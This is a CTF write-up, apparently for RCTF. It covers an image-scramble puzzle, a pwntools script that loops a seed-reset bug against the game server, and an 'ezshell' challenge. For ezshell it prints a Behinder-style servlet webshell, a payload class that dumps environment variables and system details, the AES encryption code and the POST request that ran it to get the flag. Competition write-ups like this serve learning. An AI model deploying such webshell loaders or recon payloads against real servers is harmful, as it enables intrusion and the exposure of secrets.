misc?all stack!
welcome_to_rctf
just go ROIS
CheckIn
little wired,when you post issuse, then actions will work
you can see,your issues, is on there.the flag always ***,
This means that when I enter the correct five-digit number, it will be replaced with ***, and then just find someone else’s actions.
i find it
the flag is 52079,solved!
coolcat
open the link,i saw,visit/getImage
wow,cool pic
in /upload,i upload a pic then i get wired pic
So let’s take a look at the code
def ACM(img, p, q, m):
counter = 0
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
while counter < m:
dim = width, height = img.size
with Image.new(img.mode, dim) as canvas:
for x in range(width):
for y in range(height):
nx = (x + y * p) % width
ny = (x * q + y * (p * q + 1)) % height
canvas.putpixel((nx, ny), img.getpixel((x, y)))
img = canvas
counter += 1
return canvas
# My image was encrypted by ACM , but I lost the p ,q and m ......
I dont know about p and q and m,but i can confirm,the m is random.
So, I made a special picture to certify my idea,The /getImage pic size is 600×600,so do i.
from PIL import Image
with Image.new('RGB',(600,600),(0,0,0)) as pic:
pic.putpixel((0,1),(255,255,255))
pic.save('C:/Users/Snowywar/Desktop/e99aa4e9b7fc4ed5a74a590a63b131e6/1.jpg')
pic.show()
i got this pic,
upload,then I got a variety of different results. Since the number of m is random, then there must be a situation where m=1, and the values of p and q can be directly calculated. And I conducted a test. m (the number of runs), more run then points obtained will be farther away from the original points.
After many tests, I got the closest point
use photoshop,i got this coordinate,(66,66)
But I still need /getImage when m=1, and continue to test many times.
finally,I got this one
using my py, i can get flag.
from PIL import Image
img = Image.open('./tes1.jpg')
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
p= 66
q= 66
with Image.new(img.mode, dim) as canvas:
for nx in range(width):
for ny in range(height):
y = (ny-nx*q)%600
x = (nx-y*p)%height
canvas.putpixel((x, y), img.getpixel((nx, ny)))
canvas.show()
It is wasnt rabbit?
Monopoly
a game,need 10 million win the game.
The game of luck does not even require reverse analysis of the program.
When you choose hard mode, it will let you enter seed, which determines your next steps and behavior
When I was playing here again, I found that press 4 to return to the difficulty selection, and then press 3 to return to the difficulty mode. He will let you enter a new seed, but the amount of money remains the same. Maybe this is a bug.
At the same time, the number of steps in the first step of different seeds is also fixed, indicating that it is pseudo-random.
this is my seed and test.
I found that when the seed is 22, the amount of money will be triggered to double, and I wrote a looping script to get the flag
from pwn import *
import re
import time
p=remote("123.60.25.24",20031)
context.log_level="debug"
p.recvuntil('your name?\n')
p.sendline('haha')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
for i in range(999999):
#money = p.recvline('your money')
#if p.recvuntil('RCTF'):
# print(p.recvuntil('RCTF'))
p.recvuntil('want play\n')
p.sendline('4')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
p.recvuntil('want play\n')
p.sendline('4')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
ezshell
Is really misc? I dont think so.
Download the war package
protected void service(HttpServletRequest request, HttpServletResponse response) {
try {
String k;
if (request.getMethod().equals("POST")) {
response.getWriter().write("post");
k = "e45e329feb5d925b";
HttpSession session = request.getSession(); //Generate session, the next line is also
session.putValue("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
byte[] evilClassBytes = (new BASE64Decoder()).decodeBuffer(request.getReader().readLine()); //Read the content of the post request package
class U extends ClassLoader { //Override the class loader so that it can load any malicious class U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
Class evilClass = (new U(this.getClass().getClassLoader())).g(c.doFinal(evilClassBytes)); //Decrypt the post data packet basedecode and then AES
Object a = evilClass.newInstance();
Method b = evilClass.getMethod("e", Object.class, Object.class);
b.invoke(a, request, response);
} else {
//download war
} catch (Exception var10) {
}
}
so,Write a malicious class and let him call it
payload.java
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.util.*;
public class payload{
public void e(Object req, Object res) throws IOException, InterruptedException {
HttpServletRequest req1 = (HttpServletRequest)req;
HttpServletResponse res1 = (HttpServletResponse)res;
StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
Map<String, String> env = System.getenv();
Iterator var7 = env.keySet().iterator();
while(var7.hasNext()) {
String name = (String)var7.next();
basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
}
basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
Properties props = System.getProperties();
Set<Map.Entry<Object, Object>> entrySet = props.entrySet();
Iterator var9 = entrySet.iterator();
while(var9.hasNext()) {
Map.Entry<Object, Object> entry = (Map.Entry)var9.next();
basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
}
String currentPath = (new File("")).getAbsolutePath();
String driveList = "";
File[] roots = File.listRoots();
File[] var14 = roots;
int var13 = roots.length;
for(int var12 = 0; var12 < var13; ++var12) {
File f = var14[var12];
driveList = driveList + f.getPath() + ";";
}
String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
Map<String, String> entity = new HashMap();
res1.getWriter().write(basicInfo.toString()+"<br>");
res1.getWriter().write(currentPath+"<br>");
res1.getWriter().write(driveList+"<br>");
res1.getWriter().write(osInfo+"<br>");
}
}
But its not work.I saw the hint.
i know.
BehinderV2.0 unpack it to locate the equals function
public boolean equals(Object obj) {
PageContext page = (PageContext)obj;
page.getResponse().setCharacterEncoding("UTF-8");
String result = "";
try {
StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
Map<String, String> env = System.getenv();
Iterator var7 = env.keySet().iterator();
while(var7.hasNext()) {
String name = (String)var7.next();
basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
}
basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
Properties props = System.getProperties();
Set<Entry<Object, Object>> entrySet = props.entrySet();
Iterator var9 = entrySet.iterator();
while(var9.hasNext()) {
Entry<Object, Object> entry = (Entry)var9.next();
basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
}
String currentPath = (new File("")).getAbsolutePath();
String driveList = "";
File[] roots = File.listRoots();
File[] var14 = roots;
int var13 = roots.length;
for(int var12 = 0; var12 < var13; ++var12) {
File f = var14[var12];
driveList = driveList + f.getPath() + ";";
}
String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
Map<String, String> entity = new HashMap();
entity.put("basicInfo", basicInfo.toString());
entity.put("currentPath", currentPath);
entity.put("driveList", driveList);
entity.put("osInfo", osInfo);
result = this.buildJson(entity, true);
String key = page.getSession().getAttribute("u").toString();
ServletOutputStream so = page.getResponse().getOutputStream();
so.write(Encrypt(result.getBytes(), key));
so.flush();
so.close();
page.getOut().clear();
} catch (Exception var15) {
var15.printStackTrace();
}
return true;
}
Isn’t this just outputting environment variables?
Generate base64 payload data
exp
import com.sun.xml.internal.messaging.saaj.util.Base64;
import org.junit.jupiter.api.Test;
import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.Enumeration;
public class test1 extends HttpServlet {
@Test
public void test() throws IOException, NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException {
String k = "e45e329feb5d925b";
Cipher c = Cipher.getInstance("AES");
c.init(1, new SecretKeySpec(k.getBytes(), "AES"));
FileInputStream fileInputStream = new FileInputStream(new File("payload.class"));
int n = 0 ;
//i dont know how to wirte auto length,so I measured it manually
byte[] buffer = new byte[3525];
n = fileInputStream.read(buffer);
System.out.println(n);
System.out.println(Arrays.toString(buffer));
byte[] bytes = c.doFinal(buffer);
System.out.println(Arrays.toString(bytes));
String s = (new BASE64Encoder()).encodeBuffer(bytes);
System.out.println(s);
}
}
Note that the bytes length must be accurate
POST
POST /shell HTTP/1.1
Host: 124.70.137.88:60080
Content-Length: 4716
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://124.70.137.88:60080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.70.137.88:60080/shell
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-CN;q=0.7,zh;q=0.6
Cookie: JSESSIONID=EDF504EDA8DBEE209AEC526FCAADD8DC
Connection: close
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
back
...
<br/>
TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download&filename=tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://www-us.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://www.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc
<br/>
ffl4444gg=RCTF{e2zzzz5h333ll_sooo_ez}
<br/>
JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre
<br/>
...
暂无评论内容